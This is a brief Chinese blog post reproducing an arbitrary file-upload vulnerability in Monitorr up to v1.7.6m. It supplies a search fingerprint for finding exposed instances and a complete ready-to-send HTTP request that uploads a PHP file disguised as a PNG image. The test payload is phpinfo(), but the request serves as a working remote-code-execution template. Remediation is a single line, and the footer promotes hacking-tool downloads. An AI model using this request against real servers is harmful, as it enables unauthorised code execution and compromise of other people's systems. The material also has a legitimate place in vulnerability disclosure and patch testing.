0x01 前言
0x02 影响平台
Monitorr ≤ v1.7.6m0x03 漏洞复现
搜索语法
icon_hash="-211006074"页面是这个酱紫
EXP如下:
POST /assets/php/upload.php HTTP/1.1Host: ip:portContent-Length: 412Accept: text/plain, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5799.196 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4QOrigin: http://127.0.0.1Referer: http://127.0.0.1/assets/php/monitorr-services_settings.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryMmx988TUuintqO4QContent-Disposition: form-data; name="fileToUpload"; filename="2.php"Content-Type: image/pngphpinfo();------WebKitFormBoundaryMmx988TUuintqO4Q--
Success~
0x04 修复方案
建议及时更新至最新版本!推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...